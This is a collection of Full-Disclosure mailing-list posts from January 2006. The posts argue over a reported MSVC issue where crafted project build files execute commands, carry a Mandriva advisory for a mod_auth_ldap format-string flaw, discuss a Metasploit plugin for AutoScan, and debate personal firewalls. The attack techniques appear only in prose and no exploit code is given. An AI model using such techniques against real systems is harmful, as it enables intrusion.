On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example ) It's interesting, eh, that the current generation of developers that MS has been ushering in since VB inception has necessitated such an advisory. --OE __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MDKSA-2006:017 - Updated mod_auth_ldap packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:017 http://www.mandriva.com/security/ ___ Package : mod_auth_ldap Date: January 19, 2006 Affected: Corporate 2.1 ___ Problem Description: A format string flaw was discovered in the way that auth_ldap logs information which may allow a remote attacker to execute arbitrary code as the apache user if auth_ldap is used for authentication. This update provides version 1.6.1 of auth_ldap which corrects the problem. Only Corporate Server 2.1 shipped with a supported auth_ldap package. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150 ___ Updated Packages: Corporate Server 2.1: a579c887e48daaa8281ecdc4e1381fa0 corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.i586.rpm 3af337e3989aed18d9c6e634ecb3e47b corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm Corporate Server 2.1/X86_64: b3c27d91b6fa68e557507318c8e18f0c x86_64/corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.x86_64.rpm 3af337e3989aed18d9c6e634ecb3e47b x86_64/corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDz9lvmqjQ0CJFipgRAhbvAKDejWx5RUTciABT7qVXho9XOyOH5ACgsi58 FLI7qZytVoR7yezzkdYV47M= =GvY0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
On 1/19/06, redsand [EMAIL PROTECTED] wrote: i think the author of this advisory is desperate for advisories or attention. Well maybe the guy was just misled because Microsoft led him to believe it was something exciting? Either way it seems like anyone could open a project file in notepad and insert/modify anything they want in there. I mean its not like we've ever been able to trust projects or Makefiles/configures anyways. either way he needs to open a disassembler and work on something else. -sb Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example ) What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools [AutoScan]
Lots of interest! -Adriel -Original Message- From: Vincent van Scherpenseel [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 21:33:50 +0100 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools [AutoScan] Ha! Funny to see a video demo of some code I've written. My alias is 'rastakid' and I wrote the metasploit plugin for AutoScan. It's basicly just a perlscript using the GTK2 libraries. AutoScan is a tool which makes it incredibly easy to call external applications with its scanresults as arguments (like IP addresses). Please note: AutoScan is not developed by me, only the Metasploit plugin. I was forced to stop development a couple of months ago because I got really busy with school and left my parent's house so I had no time to work on it anymore. I'm thinking about continuing development if I get more time and there's interest in it. - Vincent 'rastakid' van Scherpenseel [EMAIL PROTECTED] wrote: Dre, Awesome! Thank you!! -Adriel -Original Message- From: Andre Ludwig [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 13:26:54 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools http://autoscan.free.fr/index.html Used to do nessus, nmap, and metasploit via the scripting menu.. Havent toyed with it in a long while so you may want to check it out and verify it still does all of that. video of it in action here http://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml Dre On 1/18/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Wed, 18 Jan 2006 11:36:04 CST, Madison, Marc said: Developer $60K/year divided by the adopted 2080 man hours year (this is the average hours work, 40 hour week, 5 days, etc...) = $28.85/hourly, That's the *unencumbered* cost. Now add in the employer cost of health insurance (probably close to $400 or more a month), FICA Medicare, Social Security, workman's comp, pension plan - right there that's another 25% in addition to that $28.85. Now he's costing you $35/hour. And we're not done yet Then add in the cost of his office - if he has a 10x10 cubicle, and commercial space rents for $10/square foot/mo, that's another $12,000/year. Now add in electricity, the cost of administrative assistants and HR people to support it (unless it's a *small* shop and doesn't have assistants and HR), and so on. Oh, and if you buy him a new $3,000 workstation every third year, that's another $1K/year. This shit adds up. That's why the rule of thumb is the real cost of a technical hire is twice the salary... Like you said, many people make that comparison, and don't calculate the *TOTAL* cost. That's what I said..;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Check Out the new free AIM(R) Mail -- 2 GB of storage and industry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC Firewall Choices
My personal favorite was the older versions of Tiny Personal Firewall, though they did have the major flaw of popping up stuff when the computer was locked thus I stopped using it. They fixed it, but the revamped interface they put out a couple years ago wasn't to my liking. What do you think of the current Tiny compared to ZA? -sb On 1/17/06, Steven [EMAIL PROTECTED] wrote: I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines. I am trying to determine what product to go with and wanted to solicit some opinions from this mailing list. The four that I really come across and have used in some cases are ZoneAlarm, Sygate, Norton, Kerio, and Tiny. My understanding is that Norton has actually acquired Sygate and that the Sygate Personal Firewall probably wouldn't be the best choice of these now. With that in mind I am looking for a product that easy to setup, easy to use, works well, and does not take up too much in terms of system resources or harddrive space ( I also don't want it to add 20 minutes to the boot process either). I am not looking for e-mail protection, anitivrus, or any other non-firewall type services to be included. I do however want it to be able to manage applications and their internet usage. (i.e. if they install something new that tries to access the web (trojans included) they will get a popup telling them something is doing this). Any suggestions and opinions on the above products and any others that I might not have mentioned are welcomed. Also -- on top of this if someone knows of software/hardware that can scan these machines and verify whether or not both the SP2 FW and/or the 3rd part FW -- and perhaps prevent them network access if they are not running -- please let me know. [I am not sure what security products have these capabilities] Thanks Steven ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 not up to you. redsand wrote: like selling all my M$ Excel exploits [EMAIL PROTECTED] wrote: and me I think most FD members are desesperate of such newcomer comments, you have nothing to say interesting about his work he's doing before you were born. redsand wrote: i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else. Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example ) What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ 7 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ9AbAK+LRXunxpxfAQKNyhAAhtQnjmz90rgrBCOwHHuSkMaRtszPbIv3 DkE0u0reWJLkqXmGUEPJ1KZ3IvxYIbwOTT2qfSFwJYRytu9vhhgNTkOPbezq98Gu SwSsSgBkC1bKzxuRsta9ChUdBg/ajoKJ5tw7xOxtgMhfNWkbx5iDsu8jCN20NuJQ pdF5Vds49jlpv3Bu1aUcmDDbI9jPGEtxWP8ZiX7OT3WTJTl8LtE6WmUMQ73J4msL 6rb3bfJod827jCxGMoYxhL4PV9kpIYSzwmkjXjcNw4Kou3MTqfUAXVaWd82cyfq2 cRhCBhwcYQXoCMV9H8uk/HoNLhlJMUSCA1WPyTApXe3QDokhUWVMrzkGB1fcgJVF 3yoXaQ1faIdK7wT1r185p/MH0FQsPDhJlHfrF9KbetVX7+6JnWG1sNrLIqVZP2ss 5Pvvevc06UjYmNJ4OhwdfdCoFYRFBX+Ibd60wTmr5zEweBE/z69bUKeQXBrU9sDj Ep0dtVOIl2aSkE+n+FnEtquaWz+JQWEBDh+IS666BKXutcKWjTYV5rF1jkcC6nNX TVm5Cyg7FL6oTWtRzR/6Cdi3+NNWRSu/E9pCdSuNatYP+IL1+22y5Ge6TQkPkBVp 8HzCBggh1Tnwy6qnxMbt+yJw4Aq7Eqf02dwlYA0Nup47V0OQ5eutiInG0CINxt0d 3dq8HxbaM80= =AXCW -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Bug in MSVC
What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure their is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. again... this does not exploit the source code. it does exploit the build files. if i was simply compiling badprog.c then launching it, that would be stupid. i am leveraging the project files, not the source code. MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. Never had the problem with Kaspersky. I do know that configuring a firewall right takes some knowledge and I know I don't know how to do that and ZA did not come with instructions telling me that, but Kaspersky was intuitive. If just popped up and asked if you want to let a certain application get on the internet and you answer yes or no and then it remembers. I think someone who did not even know what a firewall is could use it on their computer without problems like a typical end user. That impresses me. With the proliferation of broadband I think the typical home user should have a software firewall if they have broadband. Naturally a friend of mine had Windows XP and Norton Firewall and his machine on broadband got hacked anyway. But that is consumer Norton and that is another story which would be off topic to this subject. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web At 03:51 PM 1/19/2006, Stan Bubrouski wrote: On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: Stan Bubrouski wrote in news:[EMAIL PROTECTED] As cruel as that last message was I'm sick of the ZA pros here saying its perfect, its not, far from it. Since nobody has ever claimed that ZA is perfect, in saying this you prove Yeah I didn't literally mean perfect, only that certain people seem to argue that everyone's complaints about ZA aren't real because they don't experience them. What proof could I profer here? Some flawed benchmark? A video? Why would I bother you assume I'm lying anyways. that your claims are either lies or hyperbole. If you can't argue with what So because you think that one sentence is misleading (in retrospect 'perfect' was not a good word choice), everything else I said must be untrue. Sigh. people actually said, making up things that they didn't say is fatuously dishonest. You are the one being dishonest and the one exaggerating here. You take something too literally, and call people liars. Two machines, one with NPF one with ZA. When ZA is running on one, IE is slow, when its off its slightly faster than the machine with NPF. It's not a lie, its reality. You can fly here and come see for yourself, but you can't touch anything. I don't know where you've been. -sb cheers, DaveK -- Can't think of a witty .sigline today Roses are Red, Violets are Blue, How much is ZA paying...YOU! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Re: PC Firewall Choices
-Original Message- From: Stan Bubrouski [mailto:[EMAIL PROTECTED] Sent: Friday, 20 January 2006 8:37 AM To: Greg Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices On 1/19/06, Greg [EMAIL PROTECTED] wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stan Bubrouski Sent: Friday, 20 January 2006 7:51 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: Stan Bubrouski wrote in news:[EMAIL PROTECTED] As cruel as that last message was I'm sick of the ZA pros here saying its perfect, its not, far from it. Since nobody has ever claimed that ZA is perfect, in saying this you prove Yeah I didn't literally mean perfect, only that certain people seem to argue that everyone's complaints about ZA aren't real because they don't experience them. What proof Actually, seeing no-one actually said that, I suppose that is a pointer towards you REALLY meaning that YOU cant make the prog do something therefore no-one can. I said it slowed down IE on machines here and some apps wouldn't start. Where did I claim that everyone had this problem? Again just because something doesn't affect you doesn't mean ZA isn't at fault... unless you are sitting at the exact same computer as me I don't see how you can know this... SNIP useful text that should have been sent in separate message could I profer here? Some flawed benchmark? A video? Why would I bother you assume I'm lying anyways. that your claims are either lies or hyperbole. If you can't argue with what So because you think that one sentence is misleading (in retrospect 'perfect' was not a good word choice), everything else I said must be untrue. Sigh. people actually said, making up things that they didn't say is fatuously dishonest. You are the one being dishonest and the one exaggerating here. You take something too literally, and call people Actually, I would have to agree with him that it was you doing that. You either lied or exaggerated above as I pointed out. Deal with it. How selectively we read. He accused me of lying about using the word perfect (I didn't mean it literally) and then said my claims that ZA slowed down IE and caused some apps not to load here are either lies or exaggerated because he says so. And now because you say so... you've convinced me! Is there some benchmark you'd like me to run to prove it to you? I don't think anymore needs be said. Your mistakes, above, are enough to condemn you by your own word so for the sake of not making this any worse, we'll leave it here. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
On 1/19/06, Greg [EMAIL PROTECTED] wrote: I don't think anymore needs be said. Your mistakes, above, are enough to condemn you by your own word so for the sake of not making this any worse, we'll leave it here. What a convenient cop-out. -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Re: PC Firewall Choices
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
FW: [Full-disclosure] Re: Re: PC Firewall Choices (an alternative choice)
From: William DeRieux [mailto:[EMAIL PROTECTED] Sent: Thursday, January 19, 2006 10:24 PM To: 'Nancy Kramer' Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices (an alternative choice) You could try, 8signs firewall (it is designed with servers in mind, but works for home desktops just as well) 8Sings firewall, not free though, has a wizard that walks you through creating a ruleset Asking you what servies you want to run, webserver, emailserver, etc, etc, even things that aren't servers. Plus it is really easy to use, if you inititally tell it to block all traffic, unless there is a rule for that particular traffic, no packets or data That don’t have a corresponding rule will not be able to get throught; You can right-click on that traffic in the programs log window and tell it To make a ruleset for the specific traffic, and choose to block or accepts incoming/outgoing connections or both (as simple as point click), I havent had any trouble with it, and have been running it for about half of a year. It has TCP, UDP, ICMP, ARP, RARP, Mac Address Rules - with different configuration for each network adapter, both ethernet wireless. It also has a configuration wizard for each adapter. And has the following other options *SYN Flood Protection *Port Scan Protection *and Automatic Manual Ban List (for flooding, port scanning, etc) It even has a built-in learning mode You can look them up here: http://www.consealfirewall.com/ William (*note I am not trying to ADVERTISE THIS PRODUCT, I AM just trying to help give someone an alternative, they may not have known about*) FC, ROCKS! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Thursday, January 19, 2006 10:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. Never had the problem with Kaspersky. I do know that configuring a firewall right takes some knowledge and I know I don't know how to do that and ZA did not come with instructions telling me that, but Kaspersky was intuitive. If just popped up and asked if you want to let a certain application get on the internet and you answer yes or no and then it remembers. I think someone who did not even know what a firewall is could use it on their computer without problems like a typical end user. That impresses me. With the proliferation of broadband I think the typical home user should have a software firewall if they have broadband. Naturally a friend of mine had Windows XP and Norton Firewall and his machine on broadband got hacked anyway. But that is consumer Norton and that is another story which would be off topic to this subject. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.21/235 - Release Date: 1/19/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.21/235 - Release Date: 1/19/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
FW: [Full-disclosure] Re: Re: PC Firewall Choices (an alternative choice)
From: William DeRieux [mailto:[EMAIL PROTECTED] Sent: Thursday, January 19, 2006 10:24 PM To: 'Nancy Kramer' Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices (an alternative choice) You could try, 8signs firewall (it is designed with servers in mind, but works for home desktops just as well) 8Sings firewall, not free though, has a wizard that walks you through creating a ruleset Asking you what servies you want to run, webserver, emailserver, etc, etc, even things that aren't servers. Plus it is really easy to use, if you inititally tell it to block all traffic, unless there is a rule for that particular traffic, no packets or data That don’t have a corresponding rule will not be able to get throught; You can right-click on that traffic in the programs log window and tell it To make a ruleset for the specific traffic, and choose to block or accepts incoming/outgoing connections or both (as simple as point click), I havent had any trouble with it, and have been running it for about half of a year. It has TCP, UDP, ICMP, ARP, RARP, Mac Address Rules - with different configuration for each network adapter, both ethernet wireless. It also has a configuration wizard for each adapter. And has the following other options *SYN Flood Protection *Port Scan Protection *and Automatic Manual Ban List (for flooding, port scanning, etc) It even has a built-in learning mode You can look them up here: http://www.consealfirewall.com/ William (*note I am not trying to ADVERTISE THIS PRODUCT, I AM just trying to help give someone an alternative, they may not have known about*) FC, ROCKS! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Thursday, January 19, 2006 10:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. Never had the problem with Kaspersky. I do know that configuring a firewall right takes some knowledge and I know I don't know how to do that and ZA did not come with instructions telling me that, but Kaspersky was intuitive. If just popped up and asked if you want to let a certain application get on the internet and you answer yes or no and then it remembers. I think someone who did not even know what a firewall is could use it on their computer without problems like a typical end user. That impresses me. With the proliferation of broadband I think the typical home user should have a software firewall if they have broadband. Naturally a friend of mine had Windows XP and Norton Firewall and his machine on broadband got hacked anyway. But that is consumer Norton and that is another story which would be off topic to this subject. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.21/235 - Release Date: 1/19/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.21/235 - Release Date: 1/19/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Re: PC Firewall Choices
I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
I have been following this discussion waiting for someone to mention another feature of Zone Alarm: Posted January 13, 3:00 a.m. PST Pacific Time, ROBERT X. CRINGELY http://www.infoworld.com/ A Perfect Spy? It seems that ZoneAlarm Security Suite has been phoning home, even when told not to. Last fall, InfoWorld Senior Contributing Editor James Borck discovered ZA 6.0 was surreptitiously sending encrypted data back to four different servers, despite disabling all of the suite's communications options. Zone Labs denied the flaw for nearly two months, then eventually chalked it up to a bug in the software -- even though instructions to contact the servers were set out in the program's XML code. A company spokesmodel says a fix for the flaw will be coming soon and worried users can get around the bug by modifying their Host file settings. However, there's no truth to the rumor that the NSA used ZoneAlarm to spy on U.S. citizens. :) Hummer - Original Message - From: Nancy Kramer [EMAIL PROTECTED] To: Greg [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 11:27 PM Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Possible large botnet
